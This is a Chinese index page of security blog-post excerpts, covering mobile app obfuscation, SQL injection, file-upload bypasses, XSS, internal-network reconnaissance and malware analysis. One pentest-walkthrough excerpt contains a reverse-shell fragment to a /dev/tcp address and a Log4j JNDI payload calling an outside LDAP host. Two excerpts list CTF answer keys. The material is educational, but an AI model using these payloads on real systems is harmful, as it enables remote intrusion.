Ms08067_Web安全攻防

#Android系统安全书籍

Android系统安全ANDROID安全架构深究Android安全攻防权威指南Android安全攻防实战(南非)keithmakan,崔孝晨;武晓音(译)Android安全技术揭秘与防范Android软件安全与逆向分析
Fitz_Lee·2022-02-16 11:36

Android 混淆总结

混淆关于混淆的概念请移步郭霖大神博客:Android安全攻防战,反编译与混淆技术完全解析(下)。小白必看,全面易懂。使用这里就直接说怎么使用了。
_戏_梦·2022-02-14 15:12

Union注入实验笔记

本文采用的是《Web安全攻防渗透测试实战指南》提供的代码及数据库.1环境介绍union.php";}?
coderge·2022-02-11 18:53

[内网安全]四.内网信息收集--BloodHound工具与PowerShell工具的使用

这系列文章入门部分将参考徐焱老师的《内网安全攻防》这本书,并结合作者在安全牛课堂分享的学习讲解视频,且看且珍惜吧!
PsgQ·2022-02-08 10:52

[内网安全]三.内网信息收集--工作组信息收集与域内信息收集

这系列文章入门部分将参考徐焱老师的《内网安全攻防》这本书,并结合作者在安全牛课堂分享的学习讲解视频,且看且珍惜吧!
PsgQ·2022-02-08 10:22

安全攻防-kali内网渗透实战

外网打点首先对web进行端口扫描,发现38080端口和22端口访问一下38080端口发现是一个errorpage用Wappalyzer看一下是什么架构,但是好像没有检测出来【一>所有资源获取&/dev/tcp/192.168.1.105/99990>&1抓包添加payload=${jndi:ldap:1/192.168.199.140:1389/TomcatBypass/Command/Base6
kali_Ma·2022-02-08 10:41

【Microsoft Azure 的1024种玩法】五、基于Azure Cloud Shell 一站式创建Linux VM

【前期文章】【MicrosoftAzure的1024种玩法】一.一分钟快速上手搭建宝塔管理面板【MicrosoftAzure的1024种玩法】二.基于Azure云平台的安全攻防靶场系统构建
一直特立独行的兔先生·2021-11-22 13:00

用python写一个自动化盲注脚本

参考资料:《python安全攻防》和盲注相关的payload写
雪痕*·2021-11-03 19:00

【渗透测试自学系列】——Web安全攻防技术演化

目录1.1.1.简单网站1.1.1.1.静态页面1.1.1.2.多媒体阶段1.1.1.3.CGI阶段1.1.1.4.Ajax1.1.1.5.MVC1.1.2.数据交互1.1.2.1.简单数据交互1.1.2.2.RESTful1.1.2.3.GraphQL1.1.2.4.二进制1.1.3.中间件1.1.3.1.架构复杂化1.1.3.2.分布式1.1.3.3.CI/CD1.1.4.云服务1.1.4.1
LexSaints·2021-10-31 12:06

当爬虫工程师遇到 CTF丨B 站 1024 安全攻防题解

答案参考第一题:a1cd5f84-27966146-3776f301-64031bb9第二题:36c7a7b4-cda04af0-8db0368d-b5166480第三题:9d3c3014-6c6267e7-086aaee5-1f18452a第四题:3d5dd579-0678ef93-18b70cae-cabc5d51第五题:516834cc-50e448af-bcf9ed53-9ae4328e第
·2021-10-26 16:21

当爬虫工程师遇到 CTF丨2021 年 B 站 1024 安全攻防题解

文章目录答案参考第一题:加密解密第二题:前端配置项第三题:最好的语言第四题:SQL注入第五题:APP逆向第六题:IDA逆向SO第七题:风控恶意IP总结答案参考第一题:a1cd5f84-27966146-3776f301-64031bb9第二题:36c7a7b4-cda04af0-8db0368d-b5166480第三题:9d3c3014-6c6267e7-086aaee5-1f18452a第四题:
K哥爬虫·2021-10-23 18:50

php安全攻防利用文件上传漏洞与绕过技巧详解

目录前言文件上传漏洞的一些场景场景一:前端js代码白名单判断.jpg|.png|.gif后缀场景二:后端PHP代码检查Content-type字段场景三:代码黑名单判断.asp|.aspx|.php|.jsp后缀场景四:代码扩大黑名单判断绕过方式——htaccsess:绕过方式——大小写绕过:场景五:一些复合判断空格、点绕过(windows)::$DATA绕过(windows)双写绕过%00截断%
·2021-10-14 18:20

php安全攻防世界unserialize函数反序列化示例详解

目录步骤总结步骤首先打开题目,发现给了一段源码:分析源码,发现类里面有三个魔术方法:__construct():构造函数,对类的变量进行初始化,创建时自动调用,用得到的参数覆盖$file__destruct():销毁时调用,会显示文件的代码,这里要显示fl4g.php__wakeup():在进行反序列化之前会调用,会把$file重置成index.php正则表达式的含义:o或c开头,冒号,一个或多个
·2021-10-14 16:42

堆叠注入

SQL注入之堆叠注入之前一直以为堆叠注入不适合mysql数据库,实战中也没有尝试过堆叠注入,今天看书《web安全攻防渗透测试指南》才发现原来mysql也可以。问题原因:1、使用PDO方式查询数据。
草莓养殖户·2021-06-23 19:02

第一届“百度杯”信息安全攻防总决赛 线上选拔赛

类型:MISC题目:findtheflag下载文件是一个cap包里面并没有,我还傻乎乎的找。。。。。。。。。。。其实这个文件损坏了,需要进行修复,这里说一个简单的方法!在windows下用txt打开搜索:whereistheflag发没发现有些奇怪????lf和ga反过来fl和ag然后链接起来是不是flag!!!!然后就是漫长的拼接。。。。得到flag:flag{aha!_you_found_it
1f28dd1475ee·2021-06-22 22:25

隐藏通信隧道技术——《内网安全攻防.渗透测试实战指南》学习笔记三

隐藏通信隧道技术一、隐藏通信隧道基础知识1.隐藏通信隧道概述什么是隧道?这里的隧道就是一种绕过端口屏蔽的通信方式。隐藏通信隧道技术常用于在访问受限的网络环境中追踪数据流向和在非受信任的网络中实现安全的数据传输。常用的隧道技术:网络层:IPv6隧道、ICMP隧道、GRE隧道传输层:TCP隧道、UDP隧道、常规的端口转发。应用层:SSH隧道、DNS隧道、HTTP隧道、HTTPS隧道2.判断内网的连通性
风居住街道0120·2021-06-21 08:32

回顾 | 穿越火线后台技术负责人操程携TcaplusDB亮相IGS大会腾讯云游戏&新文娱分论坛

本次,腾讯云从语音技术升级、互动娱乐在全真互联网的革新,以及游戏安全攻防挑战的三个方面,讲述技术实现未来生活的相关解读。
·2021-06-18 21:16

IGS大会回顾|穿越火线手游背后的数据库TcaplusDB

本次,腾讯云从语音技术升级、互动娱乐在全真互联网的革新,以及游戏安全攻防挑战的三个方面,讲述技术实现未来生活的相关解读。
·2021-06-18 21:43

常见 Web 安全攻防总结

XSSXSS(CrossSiteScript),跨站脚本攻击,因为缩写和CSS(CascadingStyleSheets)重叠,所以只能叫XSS。XSS的原理是恶意攻击者往Web页面里插入恶意可执行网页脚本代码,当用户浏览该页之时,嵌入其中Web里面的脚本代码会被执行,从而可以达到攻击者盗取用户信息或其他侵犯用户安全隐私的目的。XSS的攻击方式千变万化,但还是可以大致细分为几种类型。非持久型XSS
偶木木偶·2021-06-12 19:46

iOS安全攻防-代码混淆、反调试

一、静态分析静态分析是指用工具对程序结构,代码逻辑的分析。很大程度上取决关键字,通过关键字找到敏感代码,进行破解。所以静态分析的防护主要是代码混淆。代码混淆念大婶在博客中介绍了两种方法,用于保护代码逻辑,对抗逆向分析代码混淆通过宏定义,混淆objective-c消息(函数),用于对抗class-dump。敏感逻辑用C实现通过static关键字和函数指针的方式,将关键逻辑隐藏,可以对抗class-d
一誠·2021-06-12 00:26

常见端口对应服务和攻击放方向(记得补充各个服务信息)

抄自《Web安全攻防渗透测试实战指南》P8-10文件共享服务端口端口#端口说明#攻击方向21/22/69#FTP、TFTP文件传输协议#允许匿名的上传、下载、爆破和嗅探操作2049#Nfs服务#配置不当
草莓养殖户·2021-06-10 04:14

ios逆向攻防?逻辑

逻辑教育-iOS逆向安全攻防/逆向/砸壳/重签名/Hook/越狱/汇编/APP防护。
2588000d8b42·2021-06-04 04:29

python安全攻防---爬虫基础---BeautifulSoup解析

0x01基础使用bs4首先要安装,安装后导入importbs4bs对象有两个方法,一个是find,另一个是find_allfind(标签名,属性值):只返回一个,返回也是bs对象,可以继续用find和find_all方法find(name='table',attrs={'class':'hq_table'})find_all(标签名,属性值):返回所有符合条件,返回也是bs对象,可以继续用find
go0dStudy·2021-05-28 14:53

python安全攻防---爬虫基础--re解析数据

0x01re基础使用re模块,必须先导入re模块importrefindall():匹配所有符合正则的内容,返回的是一个列表importrestr="我的电话:10086,女朋友电话:11011"list=re.findall('\d+',str)print(list)finditer():匹配所有符合的内容,返回的是迭代器,使用group可取到内容importrestr="我的电话:10086,
go0dStudy·2021-05-28 13:45

python安全攻防---爬虫基础---get和post提交数据

get提交数据1get提交的数据就附在提交给服务器的url之后,以?开头参数之间以&隔开,例如/admin/user/123456.aspx?name=123&id=123案例:写个脚本,在sogou自动搜索周杰伦,并将搜索页面的数据获取程序如下:importrequestsquery=input("请输入一个你喜欢的明星:")url=f'https://www.sogou.com/web?que
go0dStudy·2021-05-25 17:01

python安全攻防---信息收集---whois查询

whois是用来查询域名的IP以及所有者信息的传输协议。简单地说,whois就是一个数据库,用来查询域名是否以及被注册,以及注册域名的详细信息(如域名所有人、域名注册商等)。使用whois查询,首先通过pip安装python-whois模块pipinstallpython-whois我的电脑上有python2和python3两个版本,所以用pip3安装的程序为:#-*-coding:utf-8-*
go0dStudy·2021-05-24 22:22

安全攻防之XSS

本文旨在将日常开发上遇见的问题作总结,通过不断补全安全攻防方面的知识,形成对安全攻防体系有良好的运用。
JyLie·2021-05-22 10:37

从程序媛到启明星辰集团云安全总经理,郭春梅博士揭秘云时代安全攻防之道...

从无序中寻找踪迹,从眼前事探索未来。2021年正值黄金十年新开端,CSDN以中立技术社区专业、客观的角度,深度探讨中国前沿IT技术演进,推出年度重磅企划栏目——「拟合」,通过对话企业技术高管大咖,跟踪报道企业前沿技术资讯,分享真知灼见,以点到面折射出中国IT技术最新动态,传播技术影响力,帮助开发者与企业捋清思路,共创数字经济新未来。技术变革机遇和挑战并存,当下安全漏洞、攻击勒索事件频出,如何保障企
AI科技大本营·2021-05-18 11:35

【蓝鸥AR/VR开发基础】实践课

蓝鸥(www.lanou3g.com)是一家集产、学、研、创为一体的综合性移动互联网研发培训机构,致力于iOS开发、Unity3D游戏开发、Android开发、HTML5前端开发和Web安全攻防等技术人才的培养
蓝鸥3G·2021-05-15 16:22

网络安全攻防——webshell攻击&文件操作漏洞

文章目录1、文件加载与导入load_file()读取服务器中的文件intooutfile()向服务器导入本地文件2、一句话木马(小马)+大马+webshell2.1一句话木马2.2大马2.3webshell软件2.4附:常见命令3、文件上传漏洞4、文件包含漏洞5、文件下载漏洞6、CSRF漏洞7、总结:此文章仅仅用于学习,请学习国家网络安全法,严禁将文章内容应用于破坏网络环境。1、文件加载与导入数据
孤旅青山迷情人·2021-05-14 09:17

网络安全攻防——SQL注入

文章目录0、常用查询1、or+limit全局查询2、联合查询基础3、bool盲注与爆破使用brup爆破4、time盲注5、利用updatexml()报错注入6.插入/更改注入7.删除注入8.二次注入9.堆查询注入10、一些函数总结limit详解:11、总结与归纳0、常用查询数据库名#查询所有数据库?id=0'unionselect1,group_concat(schema_name),3fromi
孤旅青山迷情人·2021-05-14 09:55

网络安全攻防_基础_第一课

文章目录1、环境搭建1.1、Aboutbrup1).brup安装与介绍2).brup与浏览器拦截的代理配置3).认识brup的基本功能2、PHP与url3、判断闭合4、判断列数1、环境搭建phpStudy+火狐浏览器+hackbarV2+NewHackbar+FoxyProxy+brup1.1、Aboutbrup1).brup安装与介绍安装jdk,配置环境变量,控制台java和javac有东西证明
孤旅青山迷情人·2021-05-14 09:05

【蓝鸥AR/VR开发基础】For语句的使用

蓝鸥(www.lanou3g.com)是一家集产、学、研、创为一体的综合性移动互联网研发培训机构,致力于iOS开发、Unity3D游戏开发、Android开发、HTML5前端开发和Web安全攻防等技术人才的培养
蓝鸥3G·2021-05-12 17:23

iOS安全攻防之代码混淆

在逆向过程中,通过动态调试、静态分析等手段可以破解很多程序。我们可以采用代码混淆,降低逆向分析代码的可读性,从而加大逆向的难度。一、关键类、关键方法混淆1.源代码#import"ViewController.h"#import"UserInfo.h"@interfaceViewController()@end@implementationViewController-(void)viewDidLo
king_jensen·2021-04-30 06:19

蓝鸥的小波老师—Uniity 3D教学

蓝鸥(www.lanou3g.com)是一家集产、学、研、创为一体的综合性移动互联网研发培训机构,致力于iOS开发、Unity3D游戏开发、Android开发、HTML5前端开发和Web安全攻防等技术人才的培养
蓝鸥3G·2021-04-28 10:15

《内网安全攻防.渗透测试实战指南》学习笔记二:内网信息收集

内网信息收集在内网环境中,信息收集尤为重要。信息收集的广度与深度,往往决定你的渗透测试的成果。工作组信息收集本机信息收集有通常有以下几种信息需要收集:1.查询网络配置ipconfig/all可以判断是否处于内网、内网IP段、网关、DNS服务器地址、判断有没有域2.查询用户列表netuser查看本机用户列表可以看大型企业的用户名命名规则netlocalgroupadministrators查看本机管
风居住街道0120·2021-04-15 10:22

这么魔性的黑客攻击,你们可能这辈子都见不到

其实,网络安全攻防之战并不像华山论剑,充满武侠小说般的英雄豪情。互联网上常见
wangsusu·2021-04-14 02:57

阿里大佬用7部分讲明白Web安全攻防 渗透测试(学完可就业)

首先来谈谈网络安全就业方面由于我国网络安全起步晚,所以现在网络安全工程师十分紧缺。根据职友集的数据显示,当前市场上需求量较大的几类网络安全岗位,如安全运维、渗透测试、等保测评等,平均薪资水平都在10k左右。随着经验和水平的不断增长,网络安全工程师可以胜任更高阶的安全架构、安全管理岗位,薪资更是可达30k。网络安全工程师的工作还有以下几个优点:1、职业寿命长:网络工程师工作的重点在于对企业信息化建设
李志宽·2021-04-10 14:36

01-汇编基础(1)

前言从本篇文章开始,即将给大家分享关于iOS逆向安全攻防等相关的知识点,在分析逆向之前,我们必须掌握关于汇编的相关的知识点,作为逆向学习的一个准备。
深圳_你要的昵称·2021-04-01 16:51

[HW必备]|蓝队防守必须排查的57个安全漏洞与解决方案

欢迎关注我的微信公众号:安全攻防渗透信息安全领域原创公号,专注信安领域人才培养和知识分享,致力于帮助叁年以下信安从业者的学习和成长。
Co01Fire·2021-03-18 14:36

iOS之武功秘籍⑦: dyld加载流程 -- 应用程序的加载

玩过逆向的iOSer都知道可以往+load方法注入代码来进行安全攻防,而+load方法先于main函数执行,那么main函数之前都发生了哪些有趣的事呢?本文就将带着大家来揭开这片神秘面纱!
長茳·2021-03-10 00:24

国内首档程序员真人秀?这不比博人传热血?!

本着猎奇的心理,我还是看完了两分钟的预告,发现主要是组织同学们对打网络安全攻防和AI赛。就这?有啥可看的?看别人训模型吗?还是看别人敲shell?
CSDN 程序人生·2021-02-20 14:13

(全网方案整合商)从url输入到建立自己的前端知识体系(巨图警告)

从浏览器多进程到JS单线程,JS运行机制最全面的一次梳理常见六大Web安全攻防解析说一说从输入URL到页面呈现发生了什么?
·2021-02-03 15:38

技术分享 | “锦行杯“比赛 Writeup

2020年12月27日,锦行科技携手华南农业大学数学与信息学院、软件学院顺利举办了“锦行杯”大学生网络安全攻防对抗实战。
Jeeseen123·2021-02-02 14:15

BIGO安全建设

一、网络安全对于一个企业来说,网络安全(CyberSecurity)层面的建设可主要分为三个方向:基础安全、安全体系、安全攻防。基础安全属于前期工作,是整个安全防御纵深体系的第一道墙。
BIGO技术·2021-01-09 15:41

python terminal模块_【Python安全攻防过渡篇:web编程和环境搭建】

web编程web编程不是说用python做web开发,而是用python与web交互。常用的模块有urlib,urlib2,这是python内置的模块。同时,还有基于urlib的第三方库,比如requests,BeautifulSoup,这里我们主要用requests举例,后期介绍爬虫的时候会详细说一下这些库/函数,现在主要是带大家先了解web交互这一块,不然等会儿写代码没法写。准备条件需要用到的
金融包工头·2021-01-03 11:25

python terminal模块_【python安全攻防】web编程和环境搭建

web编程web编程不是说用python做web开发,而是用python与web交互。常用的模块有urlib,urlib2,这是python内置的模块。同时,还有基于urlib的第三方库,比如requests,BeautifulSoup,这里我们主要用requests举例,后期介绍爬虫的时候会详细说一下这些库/函数,现在主要是带大家先了解web交互这一块,不然等会儿写代码没法写。准备条件需要用到的
weixin_39867066·2020-12-20 21:59

[安全攻防进阶篇] 十.熊猫烧香病毒机理IDA和OD逆向分析--病毒释放过程(中)

如果你想成为一名逆向分析或恶意代码检测工程师,或者对系统安全非常感兴趣,就必须要认真分析一些恶意样本。熊猫烧香病毒就是一款非常具有代表性的病毒,当年造成了非常大的影响,并且也有一定技术手段。本文将详细讲解熊猫烧香的行为机理,并通过软件对其功能行为进行分析,这将有助于我们学习逆向分析和反病毒工作。后续作者还将对其进行逆向调试,以及WannaCry勒索蠕虫、各种恶意样本及木马的分析。基础性文章,希望您
Eastmount·2020-12-19 16:38

[安全攻防进阶篇] 九.熊猫烧香病毒机理IDA和OD逆向分析(上)

如果你想成为一名逆向分析或恶意代码检测工程师,或者对系统安全非常感兴趣,就必须要认真分析一些恶意样本。熊猫烧香病毒就是一款非常具有代表性的病毒,当年造成了非常大的影响,并且也有一定技术手段。本文将详细讲解熊猫烧香的行为机理,并通过软件对其功能行为进行分析,这将有助于我们学习逆向分析和反病毒工作。后续作者还将对其进行逆向调试,以及WannaCry勒索蠕虫、各种恶意样本及木马的分析。基础性文章,希望您
Eastmount·2020-12-08 21:38

网络安全技术入门到项目实战

1.一、网络安全攻防实战课1.网络安全入门导论.ts2.网络安全行业解读.ts3.网络安全学习指南.ts4.网络&&与防御(互联网发展史).ts5.网络&&与防御(KaliLinux).ts6.网络&&
weixinhmz·2020-12-07 16:53
上一页 4 5 6 7 8 9 10 11 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他